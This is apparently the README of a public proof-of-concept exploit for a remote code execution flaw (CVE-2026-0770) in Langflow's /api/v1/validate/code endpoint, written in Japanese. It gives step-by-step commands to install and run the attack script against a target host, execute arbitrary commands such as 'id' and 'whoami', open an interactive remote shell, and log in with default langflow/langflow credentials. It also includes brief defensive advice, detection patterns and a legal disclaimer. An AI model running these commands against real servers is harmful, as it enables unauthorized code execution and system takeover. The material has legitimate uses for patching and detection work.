
Langflow リモートコード実行(RCE)概念実証
Langflow におけるリモートコード実行の脆弱性
この脆弱性は以下に影響します:
Langflow
CVE-2026-0770 は、以下のエンドポイントにおけるリモートコード実行(RCE)の脆弱性です:
/api/v1/validate/code
AUTO_LOGIN=true かつデフォルト認証情報が有効な場合、攻撃者は以下を行うことができます:
この問題は、検証中の安全でない Python コード評価に起因します。
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
Python 3.8 以上がインストールされていることを確認してください。
依存関係をインストールします:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
対話型のリモートコマンド実行を起動します:
python3 CVE-2026-0770.py -t http://target:7860
例:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
例:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
詳細なデバッグ出力を表示します。
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
トークンが指定されていない場合、スクリプトは以下を使用して自動ログインを試みます:
username: langflow
password: langflow
成功すると、access_token を取得して処理を続行します。
管理者は以下を行う必要があります:
AUTO_LOGIN を無効化/api/v1/validate/code へのアクセスを制限以下を監視してください:
/api/v1/validate/code への不審な POST リクエスト
以下を含むコード:
__import__subprocessthrow(Exception(デフォルト認証情報を使用した繰り返しのログイン試行
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
セキュリティ研究者 | エクスプロイト開発者 | PoC ライター
MIT ライセンスの下で配布されています。 完全なライセンスはこちらで確認できます:
このプロジェクトは以下を目的としています:
所有していない、または明示的なテスト許可がないシステムに対する不正使用は違法です。